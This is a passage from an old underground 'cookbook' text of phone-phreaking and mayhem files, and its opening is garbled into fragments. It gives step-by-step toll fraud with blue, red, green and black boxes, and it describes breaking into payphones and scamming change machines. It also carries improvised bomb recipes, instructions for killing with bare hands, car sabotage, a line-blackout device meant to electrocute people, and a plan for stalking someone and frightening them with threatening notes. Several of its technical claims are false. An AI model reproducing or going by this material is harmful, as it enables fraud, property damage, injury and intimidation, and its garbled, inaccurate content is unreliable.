-2000 (?)
-2001
-2002
-2003
-3000
-3001
-3002
-3003 locations known them. 200x 300x definitely known. Rumor pattern repeats
itself proven.
Dialing: before, causes residence charged bills low!!! ways discovered PBX.
Incorporating loop. am sure more, four PBX: easiest method creating Simply
Alliance, input PBX outside alliance.
example be: 800-241-4911 answers tone. tone
Code: 1234
After tone, line. hear Box: rather simple starting procedure conference: of.
609-609-6099 hit 2600hz. fone hung up. ><beep><kerchunk> You have now 'seized' a
trunk. After this, switch to
multi-frequency and dial:
KP-0-700-456-x00x-ST
· KP = KP tone on Blue Box
· x = variable between 1 and 3
· ST = ST tone on Blue Box
The equipment now thinks that the operator has dialed Alliance from her
switchboard and the conference shall be billed there. Since Blue Boxing is such
a large topic, this is as far as I will go into its
uses.
Billing to a loop:
A third method of receiving a free conference is by billing out to a loop. A
loop is 2 numbers that when two people call, they can talk to each other. You're
saying woop-tee-do right? Wrong! Loops
can be <very> useful to phreaks. First, dial alliance direct. After going
through the beginning procedure, which will be discussed later in this tutorial,
dial 0 and wait for an Alliance operator. When she
answers tell her you would like to bill the conference to such and such a
number. (A loop where your phriend is on the other side) She will then call that
number to receive voice verification. Of course
your phriend will be waiting and will accept the charges. Thus, the conference
is billed to the loop.
Billing to call forwarding:
When you dial a number that is call forwarded, it is first answered by the
original location, then forwarded. The original location will hang up if 2600hz
is received from only one end of the line.
Therefore, if you were to wait after the forwarded residence answered, you would
receive the original location's dial tone.
Example:
Dial 800-325-4067
The original residence would answer, then forward the call, a second type of
ringing would be heard. When this second residence answers simply wait until
they hang up. After about twenty seconds
you will then receive the original residence's dial tone since it heard 2600hz
from one end of the line. Simply dial Alliance from this point and the
conference will be billed to the original residence. These
are the four main ways to receive a free conference. I am sure
many more exist, but these four are quite handy themselves.
Logon Procedure:
Once Alliance answers you will hear a two-tone combination. This is their way of
saying 'How many people do you want on the conference dude?' Simply type in a
2-digit combination, depending on
what bridge of Alliance you are on, between 10 and 59. After this either hit '*'
to cancel the conference size and input another or hit '#' to continue. You are
now in Alliance Teleconferencing and are
only seconds away from having your own roaring conference going strong!!!
Dialing in Conferees:
To dial your first conferee, dial 1+npa+pre+suff and await his/her answer.
npa = area code
pre = prefix
suff = suffix
If the number is busy, or if no one answers simply hit '*' and your call will be
aborted. But, if they do answer, hit the '#' key. This will add them to the
conference. Now commence dialing other
conferees.
Joining Your Conference:
To join your conference from control mode simply hit the '#' key. Within a
second or two you will be chatting with all your buddies. To go back into
control mode, simply hit the '#' key again.
Transferring Control:
To transfer control to another conferee, go into control mode, hit the #
6+1+npa+pre+suff of the conferee you wish to give control to. If after, you wish
to abort this transfer hit the '*' key.
NOTE: Transfer of control is often not available. When you receive a message
stating this, you simply cannot transfer control.
Muted Conferences:
To request a muted conference simply hit the 9 key. I am not exactly sure what a
muted conference is but it is probably a way to keep unwanted eavesdroppers from
listening in.
Dialing Alliance Operators:
Simply dial 0 as you would from any fone and wait for the operator to answer.
Ending Your Conference:
To end your conference altogether, that is, kick everyone including yourself
off, go into control mode and hit '*'...after a few seconds simply hang up. Your
conference is over.
Are Alliance Operators Dangerous?
No. Not in the least. The worst they can do to you while you are having a
conference is drop all conferees including yourself. This is in no way harmful,
just a little aggravating.
Alliance and Tracing:
Alliance can trace, as all citizens of the United States can. But this has to
all be pre-meditated and AT&T has to be called and it's really a large hassle,
therefore, it is almost never done. Alliance simply
does not want it known that teenagers are phucking them over. The only sort of
safety equipment Alliance has on-line is a simple pen register. This little
device simply records all the numbers of the
conferees dialed. No big deal. All Alliance can do is call up that person's
number, threaten and question. However, legally, they can do nothing because all
you did was answer your fone.
NOTE: Almost all instructions are told to the person in command by Alliance
recordings. A lot of this tutorial is just a listing of those commands plus
information gathered by either myself or the phellow
phreaks of the world!!!
38. Aqua Box Plans by The Jolly Roger
Every true phreaker lives in fear of the dreaded FBI 'Lock In Trace'. For a long
time, it was impossible to escape from the Lock In Trace. This box does offer an
escape route with simple directions to
it. This box is quite a simple concept, and almost any phreaker with basic
electronics knowledge can construct and use it.
The Lock In Trace
A lock in trace is a device used by the FBI to lock into the phone user's
location so that he cannot hang up while a trace is in progress. For those of
you who are not familiar with the concept of 'locking
in', then here's a brief description. The FBI can tap into a conversation, sort
of like a three-way call connection. Then, when they get there, they can plug
electricity into the phone line. All phone
connections are held open by a certain voltage of electricity. That is why you
sometimes get static and faint connections when you are calling far away,
because the electricity has trouble keeping the line
up. What the lock in trace does is cut into the line and generate that same
voltage straight into the lines. That way, when you try and hang up, voltage is
retained. Your phone will ring just like someone
was calling you even after you hang up. (If you have call waiting, you should
understand better about that, for call waiting intercepts the electricity and
makes a tone that means someone is going through
your line. Then, it is a matter of which voltage is higher. When you push down
the receiver, then it see-saws the electricity to the other side. When you have
a person on each line it is impossible to hang
up unless one or both of them will hang up. If you try to hang up, voltage is
retained, and your phone will ring. That should give you an understanding of how
calling works. Also, when electricity passes
through a certain point on your phone, the electricity causes a bell to ring, or
on some newer phones an electronic ring to sound.) So, in order to eliminate the
trace, you somehow must lower the
voltage level on your phone line. You should know that every time someone else
picks up the phone line, then the voltage does decrease a little. In the first
steps of planning this out, Xerox suggested
getting about a hundred phones all hooked into the same line that could all be
taken off the hook at the same time. That would greatly decrease the voltage
level. That is also why most three-way
connections that are using the bell service three way calling (which is only $3
a month) become quite faint after a while. By now, you should understand the
basic idea. You have to drain all of the power
out of the line so the voltage can not be kept up. Rather sudden draining of
power could quickly short out the FBI voltage machine, because it was only built
to sustain the exact voltage necessary to
keep the voltage out. For now, imagine this. One of the normal Radio Shack
generators that you can go pick up that one end of the cord that hooks into the
central box has a phone jack on it and the
other has an electrical plug. This way, you can "flash" voltage through the
line, but cannot drain it. So, some
modifications have to be done.
Materials
A BEOC (Basic Electrical Output Socket), like a small lamp-type connection,
where you just have a simple plug and wire that would plug into a light bulb.
One of cords mentioned above, if you can't
find one then construct your own... Same voltage connection, but the restrainer
must be built in (I.E. The central box) Two phone jacks (one for the modem, one
for if you are being traced to plug the
aqua box into) Some creativity and easy work.
Notice: No phones have to be destroyed/modified to make this box, so don't go
out and buy a new phone for it!
Procedure
All right, this is a very simple procedure. If you have the BEOC, it could drain
into anything: a radio, or whatever. The purpose of having that is you are going
to suck the voltage out from the phone line
into the electrical appliance so there would be no voltage left to lock you in
with.
1. Take the connection cord. Examine the plug at the end. It should have only
two prongs. If it has three, still, do not fear. Make sure the electrical
appliance is turned off unless you want to
become a crispy critter while making this thing. Most plugs will have a hard
plastic design on the top of them to prevent you from getting in at the
electrical wires inside. Well, remove it. If you want to
keep the plug (I don't see why...) then just cut the top off. When you look
inside, Low and Behold, you will see that at the base of the prongs there are a
few wires connecting in. Those wires conduct
the power into the appliance. So, you carefully unwrap those from the sides and
pull them out until they are about an inch ahead of the prongs. If you don't
want to keep the jack, then just rip the prongs
out. If you are, cover the prongs with insulation tape so they will not connect
with the wires when the power is being drained from the line.
2. Do the same thing with the prongs on the other plug, so you have the wires
evenly connected. Now, wrap the end of the wires around each other. If you
happen to have the other end of the
voltage cord hooked into the phone, stop reading now, you're too fucking stupid
to continue. After you've wrapped the wires around each other, then cover the
whole thing with the plugs with insulating
tape. Then, if you built your own control box or if you bought one, then cram
all the wires into it and reclose it. That box is your ticket out of this.
3. Re-check everything to make sure it's all in place. This is a pretty flimsy
connection, but on later models when you get more experienced at it then you can
solder away at it and form the
whole device into one big box, with some kind of cheap Mattel hand-held game
inside to be the power connector. In order to use it, just keep this box handy.
Plug it into the jack if you want, but it will
slightly lower the voltage so it isn't connected. When you plug it in, if you
see sparks, unplug it and restart the whole thing. But if it just seems fine
then leave it.
Use
----
Now, so you have the whole thing plugged in and all... Do not use this unless
the situation is desperate! When the trace has gone on, don't panic, unplug your
phone, and turn on the appliance that it
was hooked to. It will need energy to turn itself on, and here's a great
source... The voltage to keep a phone line open is pretty small and a simple
light bulb should drain it all in and probably short the
FBI computer at the same time.
39. Hindenberg Bomb by The Jolly Roger
Needed:
· 1 Balloon
· 1 Bottle
· 1 Liquid Plumber
· 1 Piece Aluminum foil
· 1 Length Fuse
Fill the bottle 3/4 full with Liquid Plumber and add a little piece of aluminum
foil to it. Put the balloon over the neck of the bottle until the balloon is
full of the resulting gas. This is highly flammable
hydrogen. Now tie the balloon. Now light the fuse, and let it rise. When the
fuse contacts the balloon, watch out!!!
40. How to Kill Someone with your Bare Hands by The Jolly Roger
This file will explain the basics of hand-to-hand combat, and will tell of the
best places to strike and kill an enemy. When engaged in hand-to-hand combat,
your life is always at stake. There is only one
purpose in combat, and that is to kill your enemy. Never face an enemy with the
idea of knocking him out. The chances are extremely good that he will kill YOU
instead. When a weapon is not
available, one must resort to the full use of his natural weapons. The natural
weapons are:
1. The knife edge of your hands.
2. Fingers folded at the second joint or knuckle.
3. The protruding knuckle of your second finger.
4. The heel of your hand.
5. Your boot
6. Elbows
7. Knees
8. Your Teeth.
Attacking is a primary factor. A fight was never won by defensive action. Attack
with all of your strength. At any point or any situation, some vulnerable point
on your enemies body will be open for
attack. Do this while screaming as screaming has two purposes.
1. To frighten and confuse your enemy.
2. To allow you to take a deep breath which, in turn, will put more oxygen in
your blood stream.
Your balance and balance of your enemy are two important factors; since, if you
succeed in making your enemy lose his balance, the chances are nine to one that
you can kill him in your next move.
The best over-all stance is where your feet are spread about shoulders width
apart, with your right foot about a foot ahead of the left. Both arms should be
bent at the elbows parallel to each other.
Stand on the balls of your feet and bend your waist slightly. Kind of like a
boxer's crouch. Employing a sudden movement or a scream or yell can throw your
enemy off-balance. There are many
vulnerable points of the body. We will cover them now:
Eyes: Use your fingers in a V-shape and attack in gouging motion.
Nose:(Extremely vulnerable) Strike with the knife edge of the hand along the
bridge, which will cause breakage, sharp pain, temporary blindness, and if the
blow is hard enough, death. Also, deliver a
blow with the heel of your hand in an upward motion, this will shove the bone up
into the brain causing death.
Adam's Apple: This spot is usually pretty well protected, but if you get the
chance, strike hard with the knife edge of your hand. This should sever the
wind-pipe, and then it's all over in a matter of
minutes.
Temple: There is a large artery up here, and if you hit it hard enough, it will
cause death. If you manage to knock your enemy down, kick him in the temple, and
he'll never get up again.
Back of the Neck: A rabbit punch, or blow delivered to the base of the neck can
easily break it, but to be safe, it is better to use the butt of a gun or some
other heavy blunt object.
Upper lip: A large network of nerves are located. These nerves are extremely
close to the skin. A sharp upward blow will cause extreme pain, and
unconsciousness.
Ears: Coming up from behind an enemy and cupping the hands in a clapping motion
over the victims ears can kill him immediately. The vibrations caused from the
clapping motion will burst his
eardrums, and cause internal bleeding in the brain.
Groin: A VERY vulnerable spot. If left open, get it with knee hard, and he'll
buckle over very fast.
Kidneys: A large nerve that branches off to the spinal cord comes very close to
the skin at the kidneys. A direct blow with the knife edge of your hand can
cause death.
There are many more ways to kill and injure an enemy, but these should work best
for the average person. This is meant only as information and I would not
recommend that you use this for a simple
High School Brawl. Use these methods only, in your opinion, if your life is in
danger. Any one of these methods could very easily kill or cause permanent
damage to someone. One more word of
caution, you should practice these moves before using them on a dummy, or a mock
battle with a friend. (You don't have to actually hit him to practice, just work
on accuracy.)
41. Phone Systems Tutorial III by The Jolly Roger
Preface:
This article will focus primarily on the standard Western Electric single-slot
coin telephone (aka fortress fone) which can be divided into 3 types:
· dial-tone first (dtf)
· coin-first (cf): (i.e., it wants your $ before you receive a dial tone)
· dial post-pay service (pp): you pay after the party answers
Depositing coins (slugs):
Once you have deposited your slug into a fortress, it is subjected to a gamut of
tests. The first obstacle for a slug is the magnetic trap. This will stop any
light-weight magnetic slugs and coins. If it passes this, the slug is then
classified as a nickel, dime, or quarter. Each slug is then checked for
appropriate size and weight. If these tests are passed, it will then travel
through a nickel, dime, or quarter magnet as appropriate. These magnets set up
an eddy current effect which causes coins of the appropriate characteristics to
slow down so they will follow the correct trajectory. If all goes well, the coin
will follow the correct path (such as bouncing off of the nickel anvil) where it
will hopefully fall into the narrow accepted coin channel. The rather elaborate
tests that are performed as the coin travels down the coin chute will stop most
slugs and other undesirable coins, such as pennies, which must then be retrieved
using the coin release lever. If the slug miraculously survives the gamut, it
will then strike the appropriate totalizer arm causing a ratchet wheel to rotate
once for every 5-cent increment (e.g., a quarter will cause it to rotate 5
times). The totalizer then causes the coin signal oscillator to read out a
dual-frequency signal indicating the value deposited to ACTS (a computer) or the
TSPS operator. These are the same tones used by phreaks
in the infamous red boxes. For a
quarter, 5 beep tones are outpulsed at 12-17 pulses per second (pps). A dime
causes 2 beep tones at 5 - 8½ pps while a nickel causes one beep tone at 5 - 8½
pps. A beep consists of 2 tones: 2200
+ 1700 hz. A relay in the fortress called the "B Relay" (yes, there is also an
'a relay') places a capacitor across the speech circuit during totalizer readout
to prevent the "customer" from hearing the red
box tones. In older 3 slot phones: one bell (1050-1100 hz) for a nickel, two
bells for a dime, and one gong (800 hz) for a quarter are used instead of the
modern dual-frequency tones.
TSPS & ACTS
While fortresses are connected to the CO of the area, all transactions are
handled via the Traffic Service Position System (TSPS). In areas that do not
have ACTS, all calls that require operator assistance, such as calling card and
collect, are automatically routed to a TSPS operator position. In an effort to
automate fortress service, a computer system known as Automated Coin Toll
Service (ACTS) has been implemented in many areas. ACTS listens to the red box
signals from the fones and takes appropriate action. It is ACTS which says, "two
dollars please (pause) please deposit two dollars for the next ten seconds" (and
other variations). Also, if you talk for more than three minutes and then hang
up, ACTS will call back and demand your money. ACTS is also responsible for
automated calling card service.
Acts also provide trouble diagnosis for craftspeople (repairmen specializing in
fortresses). For example, there is a coin test which is great for tuning up red
boxes. In many areas this test can be activated
by dialing 09591230 at a fortress (thanks to karl marx for this information).
Once activated it will request that you deposit various coins. It will then
identify the coin and outpulse the appropriate red
box signal. The coins are usually returned when you hang up. To make sure that
there is actually money in the fone, the co initiates a "ground test" at various
times to determine if a coin is actually in the
fone. This is why you must deposit at least a nickel in order to use a red box!
Green Boxes:
Paying the initial rate in order to use a red box (on certain fortresses) left a
sour taste in many red boxer's mouths thus the green box was invented. The green
box generates useful tones such as coin
collect, coin return, and ringback. These are the tones that acts or the tsps
operator would send to The co when appropriate. Unfortunately, the green box
cannot be used at a fortress station but it must
be used by the called party.
Here are the tones:
Coin Collect 700 + 1100 Hz
Coin Return 1100 + 1700 Hz
Ringback 700 + 1700 Hz
Before the called party sends any of these tones, an operator released signal
should be sent to alert the MF detectors at the co. This can be accomplished by
sending 900 + 1500 hz or a single 2600 hz
wink (90 ms) followed by a 60 ms gap and then the appropriate signal for at
least 900 Ms.
Also, do not forget that the initial rate is collected shortly before the 3
minute period is up. Incidentally, once the above MF tones for collecting and
returning coins reach the co, they are converted into
an appropriate dc pulse (-130 volts for return & +130 volts for collect). This
pulse is then sent down the tip to the fortress. This causes the coin relay to
either return or collect the coins. The alleged
"t-network" takes advantage of this information. When a pulse for coin collect
(+130 vdc) is sent down the line, it must be grounded somewhere. This is usually
either the yellow or black wire. Thus, if
the wires are exposed, these wires can be cut to prevent the pulse from being
grounded. When the three minute initial period is almost up, make sure that the
black & yellow wires are severed; then
hang up, wait about 15 seconds in case of a second pulse, reconnect the wires,
pick up the fone, hang up again, and if all goes well it should be "jackpot"
time.
Physical Attack:
A typical fortress weighs roughly 50 lbs. With an empty coin box. Most of this
is accounted for in the armor plating. Why all the security? Well, Bell
contributes it to the following: "social changes during
the 1960's made the multislot coin station a prime target for: vandalism, strong
arm robbery, fraud, and theft of service. This brought about the introduction of
the more rugged single slot coin station and
a new environment for coin service." As for picking the lock, I will quote Mr.
Phelps: "We often fantasize about 'picking the lock' or 'getting a master key.'
Well, you can forget about it. I don't like to
discourage people, but it will save you from wasting a lot of our time--time
which can be put to better use (heh, heh)." As for physical attack, the coin
plate is secured on all four side by hardened steel
bolts which pass through two
slots each. These bolts are in turn interlocked by the main lock. One phreak I
know did manage to take one of the 'mothers' home (which was attached to a piece
of plywood at a construction site;
otherwise, the permanent ones are a bitch to detach from the wall!). It took him
almost ten hours to open the coin box using a power drill, sledge hammers, and
crowbars (which was empty -- perhaps
next time, he will deposit a coin first to hear if it slushes down nicely or
hits the empty bottom with a clunk.)
Taking the fone offers a higher margin of success. Although this may be
difficult often requiring brute force and there has been several cases of back
axles being lost trying to take down a fone! A quick
and dirty way to open the coin box is by using a shotgun. In Detroit, after
ecologists cleaned out a municipal pond, they found 168 coin phones rifled. In
colder areas, such as Canada, some shrewd
people tape up the fones using duct tape, pour in water, and come back the next
day when the water will have froze thus expanding and cracking the fone open. In
one case, "unauthorized coin
collectors" where caught when they brought $6,000 in change to a bank and the
bank became suspicious... At any rate, the main lock is an eight level tumbler
located on the right side of the coin box.
This lock has 390,625 possible positions (5 ^ 8, since there are 8 tumblers each
with 5 possible positions) thus it is highly pick resistant! The lock is held in
place by 4 screws. If there is sufficient
clearance to the right of the fone, it is conceivable to punch out the screws
using the drilling pattern below (provided by Alexander Muddy in tap #32):
!! ^
!! !
! 1- 3/16 " !! !
!<--- --->!! 1-½"
-------------------- !
! ! !! ! !
! (+) (+)-! -----------
---! !! ! ^
! ! !! ! !
! ! (Z) !! ! !
! ! !! ! 2-3/16"
---! !! ! !
! (+) (+) ! !
! !! ! !
-------------------- -----------
!!
!!
(Z) KEYHOLE (+) SCREWS
!!
After this is accomplished, the lock can be pushed backwards disengaging the
lock from the cover plate. The four bolts of the cover plate can then be
retracted by turning the bolt works with a simple
key in the shape of the hole on the coin plate (see diagram below). Of course,
there are other methods and drilling patterns.
_
! !
( )
!_!
[ROUGHLY]
DIAGRAM OF COVER PLATE KEYHOLE
The top cover uses a similar, but not as strong locking method with the keyhole
depicted above on the top left hide and a regular lock (probably tumbler also)
on the top right-hand side. It is interesting
to experiment with the coin chute and the fortresses own "red box" which bell
didn't have the balls to color red.
Miscellaneous:
In a few areas (rural & Canada), post-pay service exists. With this type of
service, the mouthpiece is cut off until the caller deposits money when the
called party answers. This also allows for free calls
to weather and other dial-it services! Recently, 2600 magazine announced the
clear box which consists of a telephone pickup coil and a small amp. It is based
on the principal that the receiver is also a
weak transmitter and that by amplifying your signal you can talk via the
transmitter thus avoiding costly telephone charges! Most fortresses are found in
the 9xxx area. Under former bell areas, they
usually start at 98xx (right below the 99xx official series) and move downward.
Since the line, not the fone, determines whether or not a deposit must be made,
dtf & charge-a-call fones make great extensions! Finally, fortress fones allow
for a new hobby--instruction plate
collecting. All that is required is a flat-head screwdriver and a pair of
needle-nose pliers. Simply use the screwdriver to lift underneath the plate so
that you can grab it with the pliers and yank
downwards. I would suggest covering the tips of the pliers with electrical tape
to prevent scratching. Ten cent plates are definitely becoming a "rarity!"
Fortress security:
While a lonely fortress may seem the perfect target, beware! The gestapo has
been known to stake out fortresses for as long as 6 years according to the grass
roots quarterly. To avoid any problems,
do not use the same fones repeatedly for boxing, calling cards, & other
experiments. The Telco knows how much money should be in the coin box and when
its not there they tend to get perturbed
(Read: Pissed Off).
42. Black Box Plans by The Jolly Roger
Introduction:
At any given time, the voltage running through your phone is about 20 Volts.
When someone calls you, this voltage goes up to 48 Volts and rings the bell.
When you answer, the voltage goes down to
about 10 Volts. The phone company pays attention to this. When the voltage drops
to 10, they start billing the person who called you.
Function:
The Black Box keeps the voltage going through your phone at 36 Volts, so that it
never reaches 10 Volts. The phone company is thus fooled into thinking you never
answered the phone and does not
bill the caller. However, after about a half hour the phone company will get
suspicious and disconnect your line for about 10 seconds.
Materials:
· 1 1.8K ½ Watt Resistor
· 1 1½V LED
· 1 SPST Switch
Procedure:
1. Open your phone by loosening the two screws on the bottom and lifting the
case off.
2. There should be three wires: Red, Green, and Yellow. We'll be working with
the Red Wire.
3. Connect the following in parallel:
· The Resistor and LED.
· The SPST Switch.
In other words, you should end up with this:
(Red Wire)
!---/\/\/\--O--!
(Line)-----! !-----(Phone)
!-----_/_------!
/\/\/\ = Resistor
O = LED
_/_ = SPST
Use:
The SPST Switch is the On/Off Switch of the Black Box. When the box is off, your
phone behaves normally. When the box is on and your phone rings, the LED
flashes. When you answer, the LED
stays on and the voltage is kept at 36V, so the calling party doesn't get
charged. When the box is on, you will not get a dial tone and thus cannot make
calls. Also remember that calls are limited to half
an hour.
PS Due to new Fone Company switching systems & the like, this may or may not
work in your area. If you live in Bumfuck Kentucky, then try this out. I make no
guarantees! (I never do...)
43. The Infamous Blotto Box!! by The Jolly Roger
(I bet that no one has the balls to build this one!)
Finally, it is here! What was first conceived as a joke to fool the innocent
phreakers around America has finally been conceived! Well, for you people who
are unenlightened about the Blotto Box, here is a brief summery of a legend.
The Blotto Box
For years now every pirate has dreamed of the Blotto Box. It was at first made
as a joke to mock more ignorant people into thinking that the function of it
actually was possible. Well, if you are The
Voltage Master, it is possible. Originally conceived by King Blotto of much
fame, the Blotto Box is finally available to the public.
NOTE: Jolly Roger can not be responsible for the information disclosed in the
file! This file is strictly for informational purposes and should not be
actually built and used! Usage of this electronical
impulse machine could have the severe results listed below and could result in
high federal prosecution! Again, I TAKE NO RESPONSIBILITY! All right, now that
that is cleared up, here is the basis
of the box and it's function.
The Blotto Box is every phreaks dream... you could hold AT&T down on its knee's
with this device. Because, quite simply, it can turn off the phone lines
everywhere. Nothing. Blotto. No calls will be
allowed out of an area code, and no calls will be allowed in. No calls can be
made inside it for that matter. As long as the switching system stays the same,
this box will not stop at a mere area code. It
will stop at nothing. The electrical impulses that emit from this box will open
every line. Every line will ring and ring and ring... the voltage will never be
cut off until the box/generator is stopped. This is
no 200 volt job, here. We are talking GENERATOR. Every phone line will continue
to ring, and
people close to the box may be electrocuted if they pick up the phone. But, the
Blotto Box can be stopped by merely cutting of the line or generator. If they
are cut off then nothing will emit any longer.
It will take a while for the box to calm back down again, but that is merely a
superficial aftereffect. Once again: Construction and use of this box is not
advised! The Blotto Box will continue as long as
there is electricity to continue with. OK, that is what it does, now, here are
some interesting things for you to do with it...
Blotto Functions/Installing
Once you have installed your Blotto, there is no turning back. The following are
the instructions for construction and use of this box. Please read and heed all
warnings in the above section before you
attempt to construct this box.
Materials:
· A Honda portable generator or a main power outlet like in a stadium or some
such place.
· 400 volt rated coupler that splices a female plug into a phone line jack.
· A meter of voltage to attach to the box itself.
· A green base (i.e. one of the nice boxes about 3' by 4' that you see around in
your neighborhood. They are the main switch boards and would be a more effective
line to start with or a
regular phone jack (not your own, and not in your area code!)
· A soldering iron and much solder.
· A remote control or long wooden pole.
Now. You must have guessed the construction from that. If not, here goes, I will
explain in detail. Take the Honda Portable Generator and all of the other listed
equipment and go out and hunt for a
green base. Make sure it is one on the ground or hanging at head level from a
pole, not the huge ones at the top of telephone poles. Open it up with anything
convenient, if you are two feeble then fuck,
don't try this. Take a look inside... you are hunting for color-coordinating
lines of green and red. Now, take out your radio shack cord and rip the meter
thing off. Replace it with the voltage meter
about. A good level to set the voltage to is about 1000 volts. Now, attach the
voltage meter to the cord and set the limit for one thousand. Plug the other end
of the cord into the generator. Take the
phone jack and splice the jack part off. Open it up and match the red and green
wires with the other red and green wires.
NOTE: If you just had the generator on and have done this in the correct order,
you will be a crispy critter. Keep the generator off until you plan to start it
up. Now, solder those lines together carefully.
Wrap duck tape or insulation tape around all of the wires. Now, place the remote
control right on to the startup of the generator. If you have the long pole,
make sure it is very long and stand back as
far away as you can get and reach the pole over.
NOTICE: If you are going right along with this without reading the file first,
you still realize now that your area code is about to become null! Then, getting
back, twitch the pole/remote control and run
for your damn life. Anywhere, just get away from it. It will be generating so
much electricity that if you stand to close you will kill yourself. The
generator will smoke, etc. but will not stop. You are now
killing your area code, because all of that energy is spreading through all of
the phone lines around you in every direction.
Have a nice day!
The Blotto Box: Aftermath
Well, that is the plans for the most devastating and ultimately deadly
box ever created. My hat goes off to: King Blotto (for the original idea).
44. Blowgun by The Jolly Roger
In this article I shall attempt to explain the use and manufacture of a powerful
blow-gun and making darts for the gun. The possession of the blow gun described
in this article IS a felony. So be careful
where you use it. I don't want to get you all busted.
Needed:
1. Several strands of yarn (About 2 inches a-piece).
2. A regular pencil.
3. A 2 ¼ inch long needle (hopefully with a beaded head. If not obtainable, wrap
tape around end of needle.
4. ¼ foot pipe. (PVC or Aluminum) Half a inch in diameter.
Constructing the dart:
1. Carefully twist and pull the metal part (Along with eraser) of the pencil
till it comes off.
2. Take Pin and start putting about 5-7 Strands of yarn on the pin. Then push
them up to the top of the pin. But not over the head of the pin (or the tape).
3. Push pin through the hollow part of the head where the pencil was before.
4. That should for a nice looking dart. (see illustration)
#####
>>>>>-----/ # is the yarn
> is the head of the pencil
- is the pin it-self
/ is the head of the pin
Using the Darts:
1. Now take the finished dart and insert it in the tube (if it is too small put
on more yarn.)
2. Aim the tube at a door, wall, sister, ect.
3. Blow on the end of the pipe.
4. Sometimes the end of the pipe may be sharp. When this happens I suggest you
wrap it with some black electrician tape. It should feel a lot better.
45. Brown Box Plans by The Jolly Roger
This is a fairly simple mod that can be made to any phone. All it does is allow
you to take any two lines in your house and create a party line. So far I have
not heard of anyone who has any problems
with it. There is one thing that you will notice when you are one of the two
people who is called by a person with a brown box. The other person will sound a
little bit faint. I could overcome this with
some amplifiers but then there wouldn't be very many of these made [Why not?]. I
think the convenience of having two people on the line at once will make up for
any minor volume loss.
Here is the diagram:
KEY:___________________________________
| PART | SYMBOL |
|---------------------------------|
| BLACK WIRE | * |
| YELLOW WIRE | = |
| RED WIRE | + |
| GREEN WIRE | - |
| SPDT SWITCH | _/_ |
| _/_ |
| VERTICAL WIRE | | |
| HORIZONTAL WIRE | _ |
-----------------------------------
* = - +
* = - +
* = - +
* = - +
* = - +
* ==_/_- +
*******_/_++++++
| |
| |
| |
| |
| |
| |
|_____PHONE____|
46. Calcium Carbide Bomb by The Jolly Roger
This is EXTREMELY DANGEROUS. Exercise extreme caution.... Obtain some calcium
carbide. This is the stuff that is used in carbide lamps and can be found at
nearly any hardware store. Take a
few pieces of this stuff (it looks like gravel) and put it in a glass jar with
some water. Put a lid on tightly. The carbide will react with the water to
produce acetylene carbonate which is similar to the gas
used in cutting torches. Eventually the glass with explode from internal
pressure. If you leave a burning rag nearby, you will get a nice fireball!
47. More Ways to Send a Car to Hell by The Jolly Roger
Due to a lot of compliments, I have written an update to file #14. I have left
the original intact. This expands upon the original idea, and could be well
called a sequel.
How to have phun with someone else's car. If you really detest someone, and I
mean detest, here's a few tips on what to do in your spare time. Move the
windshield wiper blades, and insert and glue
tacks. The tacks make lovely designs. If your "friend" goes to school with you,
Just before he comes out of school. Light a lighter and then put it directly
underneath his car door handle.
Wait...Leave...Listen. When you hear a loud "shit!", you know he made it to his
car in time. Remove his muffler and pour approximately 1 Cup of gas in it. Put
the muffler back, then wait till their car
starts. Then you have a cigarette lighter. A 30 foot long cigarette lighter.
This one is effective, and any fool can do it. Remove the top air filter. That's
it! Or a oldie but goodie: sugar in the gas tank.
Stuff rags soaked in gas up the exhaust pipe. Then you wonder why your "friend"
has trouble with his/her lungs. Here's one that takes time and many friends.
Take his/her car then break into their
house and reassemble it, in their living or bedroom. Phun eh? If you're into
engines, say eeni mine moe and point to something and remove it. They wonder why
something doesn't work. There are so
many others, but the real good juicy ones come by thinking hard.
48. Ripping off Change Machines by The Jolly Roger
Have you ever seen one of those really big changer machines in airports
Laundromats or arcades that dispense change when you put in your 1 or 5 dollar
bill? Well then, here is an article for you.
1. Find the type of change machine that you slide in your bill length wise, not
the type where you put the bill in a tray and then slide the tray in!!!
2. After finding the right machine, get a $1 or $5 bill. Start crumpling up into
a ball. Then smooth out the bill, now it should have a very wrinkly surface.
3. Now the hard part. You must tear a notch in the bill on the left side about ½
inch below the little 1 dollar symbol (See Figure).
4. If you have done all of this right then take the bill and go out the machine.
Put the bill in the machine and wait. What should happen is: when you put your
bill in the machine it thinks
everything is fine. When it gets to the part of the bill with the notch cut out,
the machine will reject the bill and (if you have done it right) give you the
change at the same time!!! So, you end up getting
your bill back, plus the change!! It might take a little practice, but once you
get the hang of it, you can get a lot of money!
\-----Make notch here. About ½" down from the 1.
49. Clear Box Plans by The Jolly Roger
The clear box is a new device which has just been invented that can be used
throughout Canada and rural United States. The clear box works on "PostPay"
payphones (fortress fones). Those are the
payphones that don't require payment until after the connection is established.
You pick up the fone, get a dial tone, dial your number, and then insert your
money after the person answers. If you don't
deposit the money then you can not speak to the person on the other end because
your mouth piece is cut off but not the ear-piece. (obviously these phones are
nice for free calls to weather or time or
other such recordings). All you must do is to go to your nearby Radio Shack, or
electronics store, and get a four-transistor amplifier and a telephone suction
cup induction pick-up. The induction
pick-up would be hooked up as it normally would to record a conversation, except
that it would be plugged into the output of the amplifier and a microphone would
be hooked to the input. So when
the party that is being called answers, the caller could speak through the
little microphone instead. His voice then goes through the amplifier and out the
induction coil, and into the back of the receiver
where it would then be broadcast through the phone lines and the other party
would be able to hear the caller. The Clear Box thus 'clears up' the problem of
not being heard. Luckily, the line will not be
cut-off after a certain amount of time because it will wait forever for the
coins to be put in. The biggest advantage for all of us about this new clear box
is the fact that this type of payphone will most
likely become very common. Due to a few things: 1st, it is a cheap way of
getting the DTF, dial-tone-first service, 2nd, it doesn't require any special
equipment, (for the phone company) This payphone
will work on any phone line. Usually a payphone line is different, but this is a
regular phone line and it is set up so the phone does all the charging, not the
company.
50. CNA List by The Jolly Roger
51. Electronic Terrorism by The Jolly Roger
1. It starts when a big, dumb lummox rudely insults you. Being of a rational,
intelligent disposition, you wisely choose to avoid a (direct) confrontation.
But as he laughs in your face, you smile
inwardly---your revenge is already planned.
2. Follow your victim to his locker, car, or house. Once you have chosen your
target site, lay low for a week or more, letting your anger boil.
3. In the mean time, assemble your versatile terrorist kit(details below.)
4. Plant your kit at the designated target site on a Monday morning between the
hours of 4:00 am and 6:00 am. Include a calm, suggestive note that quietly hints
at the possibility of another
attack. Do not write it by hand! An example of an effective note: "don't be such
a jerk, or the next one will take off your hand. Have a nice day." Notice how
the calm tone instills fear. As if written
by a homicidal psychopath.
